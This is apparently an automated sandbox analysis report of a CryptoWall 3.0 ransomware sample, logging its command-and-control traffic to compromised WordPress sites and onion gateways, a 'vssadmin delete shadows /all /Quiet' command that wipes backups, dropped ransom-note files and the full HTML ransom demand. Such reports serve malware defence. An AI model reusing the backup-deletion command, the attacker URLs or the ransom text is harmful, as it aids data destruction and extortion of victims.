Source: global trafficHTTP traffic detected: GET /wp-content/themes/r.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C918846496CD97797104275B69DB8A8C4068125492B32EB37B14D06B1F0ACC7D785D9C3713D805BC844CFB276EA1E45EFCDFBCC2AE3ED592D28886FB0E5BED1BC965BF2FBEAAB49990078AA4D876A90C62830BBA201E36D4B4D38988D11DE0B3635F5AD99270B087204BF636044B17069B5451B4B2AD146AFCE933E23D0BF085567F9DE7B6C0446D7B4A25A85DC92602B4A566325A924DE498C743DE86E56DEC092D8E1DC4D0D20931C25E7D53671538B32008CB2D6A0884D4B875FFFD208FE7C46FE57E409CB96CE738DA867312A20F0BDFF7692ACD754569A975 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0Host: serenitynowbooksandgifts.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/r.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C918846496CD97797104275B69DB8A8C4068125492B32EB37B14D06B1F0ACC7D785D9C3713D805BC844CFB276EA1E45EFCDFBCC2AE3ED592D28886FB0E5BED1BC965BF2FBEAAB49990078AA4D876A90C62830BBA201E36D4B4D38988D11DE0B3635F5AD99270B087204BF636044B17069B5451B4B2AD146AFCE933E23D0BF085567F9DE7B6C0446D7B4A25BD8C4E17EF6836F23642C06A5FF3A1CF2AEF4E14148B78507418AA0EAAE50DDC4F9D295FF1EF6F8F8C295F4189207899230F547B821D613C1DC3B1A419634028 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0Host: teenpornotube.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/r.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0Cookie: RNLBSERVERID=ded6551Connection: Keep-AliveHost: www.teenpornotube.org
Source: svcmtr.exe, 00000002.00000003.754010566.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.740190996.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.526806159.000000000072B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: global trafficDNS traffic detected: DNS query: ipinfo.io
Source: global trafficDNS traffic detected: DNS query: ezglobalmarketing.com
Source: global trafficDNS traffic detected: DNS query: fgainterests.com
Source: global trafficDNS traffic detected: DNS query: ledshoppen.nl
Source: global trafficDNS traffic detected: DNS query: serenitynowbooksandgifts.com
Source: global trafficDNS traffic detected: DNS query: www.serenitynowbooksandgifts.com
Source: global trafficDNS traffic detected: DNS query: teenpornotube.org
Source: global trafficDNS traffic detected: DNS query: www.teenpornotube.org
Source: global trafficDNS traffic detected: DNS query: shmetterheath.ru
Source: global trafficDNS traffic detected: DNS query: zpr5huq4bgmutfnf.onion.to
Source: global trafficDNS traffic detected: DNS query: zpr5huq4bgmutfnf.tor2web.org
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Content-Language: enStrict-Transport-Security: max-age=86400X-Wix-Request-Id: 1736367004.62597576918143767537Cache-Control: public,max-age=0,must-revalidateServer: PepyakaX-Content-Type-Options: nosniffAccept-Ranges: bytesAge: 0Date: Wed, 08 Jan 2025 20:10:04 GMTX-Served-By: cache-iad-kcgs7200141-IADX-Cache: MISSVary: Accept-EncodingServer-Timing: cache;desc=miss, varnish;desc=miss_miss, dc;desc=fastly_uw2-pub-1_gX-Seen-By: yvSunuo/8ld62ehjr5B7kA==,2d58ifebGbosy5xc+FRals42LSZ5E8bBqQxaDpUjQFJ2PYQ+5XrUIsPbv0s/gX53wvb3kWKRIgMIyffV4MmqLA==,2UNV7KOq4oGjA5+PKsX47PGnwEa4ahDGUcZoML+4h9BjPZTuGyYqVhtmEIgJUb4w,R8nVwPJv9QJL1m78OROO+JDBpdtDb0a8zNGo3JIhIcQ=,EJEd9b7dmFptmyI1HOovvzWqeDfbs7uk1J4m171zrEASO5XmrrCSQNDehIjmfew3RuKHdiN8uGiJxsD4qbIdaw==Transfer-Encoding: chunkedVia: 1.1 googleglb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 08 Jan 2025 20:10:06 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedSet-Cookie: csrfst=tZC5D9Jx-1736367006-0d9f160c0fa1a6c5; path=/Vary: Accept-Encoding, User-Agent
Source: svcmtr.exe, 00000002.00000002.876613547.00000000036F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Http://shmetterheath.ru/
Source: svcmtr.exe, 0000000D.00000002.406449433.0000000000431000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: http://aep554w4fm8j.fflroe598qu.com/%S
Source: restore_files_gpmus.txt287.2.drString found in binary or memory: http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B
Source: svcmtr.exe, 00000002.00000003.408228286.00000000038A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://angularjs.org
Source: 0t8amSU3vd.exe, 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp, 0t8amSU3vd.exe, 00000000.00000002.345370025.0000000000520000.00000004.00001000.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000002.875409973.0000000000240000.00000004.00001000.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmp, svcmtr.exe, 0000000B.00000002.370984556.0000000000431000.00000002.00000001.01000000.00000005.sdmp, svcmtr.exe, 0000000B.00000002.370940853.0000000000260000.00000004.00001000.00020000.00000000.sdmp, svcmtr.exe, 0000000C.00000002.387290975.00000000002C0000.00000004.00001000.00020000.00000000.sdmp, svcmtr.exe, 0000000C.00000002.387316507.0000000000431000.00000002.00000001.01000000.00000005.sdmp, svcmtr.exe, 0000000D.00000002.406412332.0000000000240000.00000004.00001000.00020000.00000000.sdmp, svcmtr.exe, 0000000D.00000002.406449433.0000000000431000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: http://aoei243548ld.keedo93i1lo.com/%S
Source: svcmtr.exe, 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmp, notepad.exe, 00000015.00000002.875324829.000000000017E000.00000004.00000020.00020000.00000000.sdmp, restore_files_gpmus.txt48.2.dr, restore_files_gpmus.txt112.2.dr, restore_files_gpmus.txt293.2.dr, restore_files_gpmus.txt119.2.dr, restore_files_gpmus.txt382.2.dr, restore_files_gpmus.txt411.2.dr, restore_files_gpmus.txt327.2.dr, restore_files_gpmus.txt376.2.dr, restore_files_gpmus.txt155.2.dr, restore_files_gpmus.txt379.2.dr, restore_files_gpmus.txt404.2.dr, restore_files_gpmus.txt303.2.dr, restore_files_gpmus.txt133.2.dr, restore_files_gpmus.txt146.2.dr, restore_files_gpmus.txt174.2.dr, restore_files_gpmus.txt292.2.dr, restore_files_gpmus.txt181.2.dr, restore_files_gpmus.txt402.2.dr, restore_files_gpmus.txt397.2.drString found in binary or memory: http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B
Source: svcmtr.exe, 00000002.00000002.876613547.00000000036F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: svcmtr.exe, 00000002.00000003.754010566.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.740190996.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.526806159.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000002.876613547.00000000036F0000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.516398200.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000002.875689270.000000000072B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: svcmtr.exe, 00000002.00000003.754010566.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.740190996.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.526806159.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.516398200.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000002.875689270.000000000072B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: svcmtr.exe, 00000002.00000003.754010566.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.740190996.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.526806159.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000002.876613547.00000000036F0000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.516398200.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000002.875689270.000000000072B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
Source: svcmtr.exe, 00000002.00000002.876613547.00000000036F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: svcmtr.exe, 00000002.00000003.754010566.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.740190996.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.526806159.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.516398200.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000002.875689270.000000000072B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: svcmtr.exe, 00000002.00000003.754010566.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.740190996.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.526806159.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.516398200.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000002.875689270.000000000072B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: svcmtr.exe, 00000002.00000003.408228286.00000000038A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://errors.angularjs.org/1.6.4-local
Source: svcmtr.exe, 00000002.00000003.526806159.00000000006ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ezglobalmarketing.com/wp-content/themes/r.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C9188
Source: svcmtr.exe, 00000002.00000003.526806159.00000000006ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fgainterests.com/wp-content/themes/r.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C918846496
Source: 0t8amSU3vd.exe, svcmtr.exe, svcmtr.exe, 00000002.00000002.875689270.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.516398200.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.526806159.00000000006D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ipinfo.io/ip
Source: svcmtr.exe, 00000002.00000002.876613547.00000000036F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ledshoppen.nl/wp-content/themes/r.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C918846496CD9

Spam, unwanted Advertisements and Ransom Demands

Source: Yara match. File source: Process Memory Space: 0t8amSU3vd.exe PID: 3452, type: MEMORYSTR
Source: Yara match. File source: Process Memory Space: svcmtr.exe PID: 3504, type: MEMORYSTR
Source: Yara match. File source: Process Memory Space: svcmtr.exe PID: 3892, type: MEMORYSTR
Source: Yara match. File source: Process Memory Space: svcmtr.exe PID: 3948, type: MEMORYSTR
Source: Yara match. File source: Process Memory Space: svcmtr.exe PID: 4000, type: MEMORYSTR
Source: C:\Users\user\AppData\Roaming\svcmtr.exe. Process created: C:\Windows\System32\vssadmin.exe "C:\Windows\System32\vssadmin.exe" delete shadows /all /Quiet
Source: 0t8amSU3vd.exe, 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp. Binary or memory string: windir%s\system32\cmd.exe /c start "" "%s"runasdelete shadows /all /Quiet openrunasvssadmin.exeKERNEL32Wow64DisableWow64FsRedirectionWow64RevertWow64FsRedirection\Recovery_File_:Zone.IdentifierSeDebugPrivilege435-3435-4546w+%s
Source: 0t8amSU3vd.exe, 00000000.00000002.345370025.0000000000520000.00000004.00001000.00020000.00000000.sdmp. Binary or memory string: windir%s\system32\cmd.exe /c start "" "%s"runasdelete shadows /all /Quiet openrunasvssadmin.exeKERNEL32Wow64DisableWow64FsRedirectionWow64RevertWow64FsRedirection\Recovery_File_:Zone.IdentifierSeDebugPrivilege435-3435-4546w+%s
Source: C:\Users\user\AppData\Roaming\svcmtr.exeProcess created: C:\Windows\System32\vssadmin.exe "C:\Windows\System32\vssadmin.exe" delete shadows /all /Quiet Jump to behavior
Source: svcmtr.exe, 00000002.00000002.875409973.0000000000240000.00000004.00001000.00020000.00000000.sdmp; Binary or memory string: windir%s\system32\cmd.exe /c start "" "%s"runasdelete shadows /all /Quiet openrunasvssadmin.exeKERNEL32Wow64DisableWow64FsRedirectionWow64RevertWow64FsRedirection\Recovery_File_:Zone.IdentifierSeDebugPrivilege435-3435-4546w+%s
Source: svcmtr.exe, 00000002.00000003.351667117.00000000006ED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Users\user\Desktop\C:\Windows\System32;;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\WindowsPowerShell\v1.0\C:\Windows\System32\vssadmin.exe"C:\Windows\System32\vssadmin.exe" delete shadows /all /Quiet C:\Windows\System32\vssadmin.exeWinsta0\Default=::=::\ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files (x86)\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeFP_NO_HOST_CHECK=NOHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCNUMBER_OF_PROCESSORS=2OS=Windows_NTPath=C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\WindowsPowerShell\v1.0\PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=x86PROCESSOR_ARCHITEW6432=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 7, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=5507ProgramData=C:\ProgramDataProgramFiles=C:\Program Files (x86)ProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Windows\system32\WindowsPowerShell\v1.0\Modules\;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windowswindows_tracing_flags=3windows_tracing_logfile=C:\BVTBin\Tests\installpackage\csilogfile.log
Source: svcmtr.exe, 00000002.00000003.351667117.00000000006DC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hWindows\System32\vssadmin.exe" delete shadows /all /Quiet ZZ
Source: vssadmin.exe, 00000006.00000002.354667398.0000000000374000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: w7Bw7Pw7`w7jw7C:\Windows\System32\vssadmin.exedeleteshadows/all/Quieti
Source: vssadmin.exe, 00000006.00000002.354605514.00000000001F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Users\user\Desktop\C:\Windows\System32;;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\WindowsPowerShell\v1.0\C:\Windows\System32\vssadmin.exe"C:\Windows\System32\vssadmin.exe" delete shadows /all /Quiet C:\Windows\System32\vssadmin.exeWinsta0\Default
Source: vssadmin.exe, 00000006.00000002.354605514.00000000001F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "C:\Windows\System32\vssadmin.exe" delete shadows /all /Quiet
Source: vssadmin.exe, 00000006.00000002.354605514.00000000001F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "C:\Windows\System32\vssadmin.exe" delete shadows /all /Quiet 0
Source: C:\Users\user\AppData\Roaming\svcmtr.exe; File created: C:\$Recycle.Bin\S-1-5-21-966771315-3019405637-367336477-1001\restore_files_gpmus.txt
Source: C:\Users\user\AppData\Roaming\svcmtr.exe; File created: C:\$Recycle.Bin\S-1-5-21-966771315-3019405637-367336477-1001\restore_files_gpmus.html
Source: C:\Users\user\AppData\Roaming\svcmtr.exe; File created: C:\$Recycle.Bin\S-1-5-21-966771315-3019405637-367336477-1003\restore_files_gpmus.txt
Source: C:\Users\user\AppData\Roaming\svcmtr.exe; File created: C:\$Recycle.Bin\S-1-5-21-966771315-3019405637-367336477-1003\restore_files_gpmus.html
Source: C:\Users\user\AppData\Roaming\svcmtr.exe; File created: C:\$Recycle.Bin\S-1-5-21-966771315-3019405637-367336477-1004\restore_files_gpmus.txt
Source: C:\Users\user\AppData\Roaming\svcmtr.exe; File created: C:\$Recycle.Bin\S-1-5-21-966771315-3019405637-367336477-1004\restore_files_gpmus.html
Source: C:\Users\user\AppData\Roaming\svcmtr.exe; File created: C:\$Recycle.Bin\S-1-5-21-966771315-3019405637-367336477-1005\restore_files_gpmus.txt
Source: C:\Users\user\AppData\Roaming\svcmtr.exe; File created: C:\$Recycle.Bin\S-1-5-21-966771315-3019405637-367336477-1005\restore_files_gpmus.html
Source: C:\Users\user\AppData\Roaming\svcmtr.exe; File created: C:\$Recycle.Bin\S-1-5-21-966771315-3019405637-367336477-1006\restore_files_gpmus.txt
Source: C:\Users\user\AppData\Roaming\svcmtr.exe; File created: C:\$Recycle.Bin\S-1-5-21-966771315-3019405637-367336477-1006\restore_files_gpmus.html
Source: C:\Users\user\AppData\Roaming\svcmtr.exe; File created: C:\$Recycle.Bin\restore_files_gpmus.txt
Source: C:\Users\user\AppData\Roaming\svcmtr.exe; File created: C:\$Recycle.Bin\restore_files_gpmus.html
Source: C:\Users\user\AppData\Roaming\svcmtr.exe; File created: C:\Config.Msi\restore_files_gpmus.txt
Source: C:\Users\user\AppData\Roaming\svcmtr.exe; File created: C:\Config.Msi\restore_files_gpmus.html
Source: C:\Users\user\AppData\Roaming\svcmtr.exe; File created: C:\Documents and Settings\user\AppData\Local\Adobe\Acrobat\DC\Cache\restore_files_gpmus.txt
Source: C:\Users\user\AppData\Roaming\svcmtr.exe; File created: C:\Documents and Settings\user\AppData\Local\Adobe\Acrobat\DC\Cache\restore_files_gpmus.html
Source: C:\Users\user\AppData\Roaming\svcmtr.exe; File created: C:\Documents and Settings\user\AppData\Local\Adobe\Acrobat\DC\ToolsSearchCacheRdr\restore_files_gpmus.txt
Source: C:\Users\user\AppData\Roaming\svcmtr.exe; File created: C:\Documents and Settings\user\AppData\Local\Adobe\Acrobat\DC\ToolsSearchCacheRdr\restore_files_gpmus.html
Source: C:\Users\user\AppData\Roaming\svcmtr.exe; File created: C:\Documents and Settings\user\AppData\Local\Adobe\Acrobat\DC\restore_files_gpmus.txt
Source: C:\Users\user\AppData\Roaming\svcmtr.exe; File created: C:\Documents and Settings\user\AppData\Local\Adobe\Acrobat\DC\restore_files_gpmus.html
Source: 0t8amSU3vd.exe, 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need 
your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/%S" target="_blank">http://aep554w4fm8j.fflroe598qu.com/%S</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/%S" target="_blank">http://aoei243548ld.keedo93i1lo.com/%S</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/%S" target="_blank">https://zpr5huq4bgmutfnf.onion.to/%S</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installation, run the browser and wait for initialization.<br>3. Type in the address b
Source: 0t8amSU3vd.exe, 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp; String found in binary or memory: Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: svcmtr.exe, 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmp; String found in binary or memory: Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: svcmtr.exe, 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmpString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your 
data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: svcmtr.exe, 0000000B.00000002.370984556.0000000000431000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your 
data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/%S" target="_blank">http://aep554w4fm8j.fflroe598qu.com/%S</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/%S" target="_blank">http://aoei243548ld.keedo93i1lo.com/%S</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/%S" target="_blank">https://zpr5huq4bgmutfnf.onion.to/%S</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installation, run the browser and wait for initialization.<br>3. Type in the address b
Source: svcmtr.exe, 0000000B.00000002.370984556.0000000000431000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: svcmtr.exe, 0000000B.00000002.370940853.0000000000260000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see 